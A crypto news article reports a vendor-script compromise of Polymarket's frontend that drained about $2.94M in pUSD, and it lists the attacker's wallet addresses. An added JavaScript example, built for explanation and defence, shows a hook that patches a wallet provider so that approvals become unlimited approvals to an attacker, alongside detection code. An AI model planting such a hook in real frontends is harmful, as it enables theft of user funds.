Polymarket To Refund Users After Vendor Script Drains $2.94M
Polymarket has contained a third-party vendor compromise after a malicious script was injected into its frontend for some users. The affected dependency has been removed, and impacted users are being contacted for full refunds.
The confirmation ties the earlier pUSD wallet drains to a frontend supply-chain incident rather than to a confirmed exploit of Polymarket's smart contracts. The failure point was a compromised vendor dependency that reached some users through the platform's web interface.
The affected users appear to match the earlier onchain alert tied to an estimated $2.94 million drain from 11 or more wallets holding pUSD. The attacker swapped stolen assets into ETH and consolidated funds through 0xe65b1C586757c5510B60F998Eebb14C1eF71E1eD.
pUSD Drains Moved Into ETH
The stolen funds came from wallets holding pUSD, Polymarket’s dollar-denominated trading collateral on Polygon. Earlier onchain tracking identified four additional theft addresses: 0xC771A30a7c1aCA828eeEF7B822ac864a64cBaAe2, 0xC44F2Ca6B30A54d17a62ceF8FAdaF2e8C8632eC4, 0x10366AdBB5C4101A65C840Da6639546179C5A107 and 0x7BCECe0d8fd92ECCf39Bc35242c6D9aAc0aA75A6.
The attack path fits a malicious frontend pattern. A user can land on the legitimate site, see a familiar interface and still be exposed if a compromised dependency injects wallet-draining logic into the session. Because the injected script runs in the site's own origin, it can call the user's wallet provider exactly as the site does: it can prompt for its own approvals or signatures, or rewrite the transaction the site was about to send. The chain and the core market contracts do not need to fail for users to lose funds through approvals, signatures or transaction prompts served through the frontend.
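The pattern above, as an added example that is not Polymarket's code and does not reproduce the actual injected script: a synchronous stand-in for an EIP-1193 wallet provider (a real `window.ethereum.request` is async) shows how a script from a compromised vendor can hook `request()` and replace an ERC-20 `approve()` the site intended to send with an unlimited approval to a different spender, how a wallet-side decode of the calldata exposes the swap, and why pinning the provider reference before third-party code runs matters. The token, exchange and attacker addresses are constructed placeholders, not addresses from the incident.

```javascript
// Added example, not Polymarket's code. Simulated wallet provider plus a monkey-patching
// hook of the kind a compromised frontend dependency can install. All addresses are
// constructed for the example.
const APPROVE_SELECTOR = "0x095ea7b3"; // first 4 bytes of keccak256("approve(address,uint256)")
const MAX_UINT256 = (1n << 256n) - 1n;

const TOKEN = "0x2222222222222222222222222222222222222222";    // hypothetical ERC-20
const EXCHANGE = "0x3333333333333333333333333333333333333333"; // hypothetical legitimate spender
const ATTACKER = "0x1111111111111111111111111111111111111111"; // hypothetical drainer

// ABI-encode approve(address,uint256): selector + 32-byte padded address + 32-byte amount.
function encodeApprove(spender, amount) {
  const addr = spender.toLowerCase().slice(2).padStart(64, "0");
  const amt = amount.toString(16).padStart(64, "0");
  return APPROVE_SELECTOR + addr + amt;
}

// Decode approve() calldata; returns null for anything that is not a well-formed approve().
function decodeApprove(data) {
  if (typeof data !== "string" || data.length !== 138 || !data.startsWith(APPROVE_SELECTOR)) return null;
  return { spender: "0x" + data.slice(34, 74), amount: BigInt("0x" + data.slice(74, 138)) };
}

// Wallet stand-in: records every transaction it is asked to sign (what the user would see).
function makeWallet() {
  const seen = [];
  return {
    seen,
    request({ method, params }) {
      if (method === "eth_sendTransaction") seen.push(params[0]);
      return "0x" + "00".repeat(32); // fake tx hash
    },
  };
}

// What wallet-draining logic in a compromised dependency can do: patch request() in place
// so every approve() the site sends becomes an unlimited approve() to the attacker.
function installDrainerHook(provider) {
  const original = provider.request.bind(provider);
  provider.request = (args) => {
    const tx = args.params?.[0];
    if (args.method === "eth_sendTransaction" && tx && decodeApprove(tx.data)) {
      return original({ ...args, params: [{ ...tx, data: encodeApprove(ATTACKER, MAX_UINT256) }] });
    }
    return original(args);
  };
}

// Wallet-side check: decode what actually arrived and flag risky approvals before signing.
function approvalRisk(tx, trustedSpenders) {
  const ap = decodeApprove(tx.data);
  if (!ap) return "not-an-approve";
  if (!trustedSpenders.map((s) => s.toLowerCase()).includes(ap.spender)) return "untrusted-spender";
  if (ap.amount === MAX_UINT256) return "unlimited-approval";
  return "ok";
}

function demo() {
  const wallet = makeWallet();
  const pinnedRequest = wallet.request.bind(wallet); // captured by app code before vendor scripts run
  const intended = { to: TOKEN, data: encodeApprove(EXCHANGE, 1000n) };

  installDrainerHook(wallet); // the compromised vendor script loads and hooks the provider

  wallet.request({ method: "eth_sendTransaction", params: [intended] }); // site's normal flow
  pinnedRequest({ method: "eth_sendTransaction", params: [intended] }); // same call, pinned reference

  const [hooked, pinned] = wallet.seen;
  return {
    hookedSpender: decodeApprove(hooked.data).spender,
    hookedRisk: approvalRisk(hooked, [EXCHANGE]),
    pinnedSpender: decodeApprove(pinned.data).spender,
    pinnedRisk: approvalRisk(pinned, [EXCHANGE]),
  };
}
```

Two caveats a practitioner should keep in mind: pinning the provider reference only helps if the app's own code runs before the vendor script does, and it does nothing against injected logic that simply issues its own `eth_sendTransaction` or signature request through `window.ethereum`. The wallet-side decode is the user's last line of defence, which is why wallets display the spender and amount of an approval rather than raw calldata.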
That makes Polymarket’s refund commitment the central user update. Affected users are now being contacted directly, while the compromised dependency has been removed from the frontend stack.
Frontend Risk Hits A Growing Prediction Market
The incident lands as Polymarket is pushing into more distribution channels and consumer-facing trading flows. A recent Polymarket-powered launch brought prediction markets into TON through Telegram-native wallets, widening access beyond the core web interface and exposing the product to more wallet environments.
The platform has also faced broader pressure around growth, promotion and user acquisition. One recent report tied Polymarket’s chief marketing officer to more than $2.5 million in PayPal transfers for creator campaigns, raising disclosure questions around paid promotion in prediction markets. Another report accused Polymarket-linked marketing of using fake-win videos to attract U.S. users, adding scrutiny around how offshore prediction-market products are promoted to restricted audiences.
The latest issue is different because it centers on user-wallet safety, frontend integrity and vendor security. A compromised dependency can place malicious wallet logic in front of users even when the interface looks familiar, which makes third-party scripts, dependency pinning and integrity checks, and emergency rollback of the frontend part of the security perimeter for trading apps.
The confirmed compromise leaves Polymarket with a narrow recovery path: reimburse affected users, remove the compromised dependency and harden the frontend supply chain. The monitor-flagged loss estimate remains near $2.94 million, with stolen pUSD swapped into ETH and consolidated through 0xe65b1C586757c5510B60F998Eebb14C1eF71E1eD.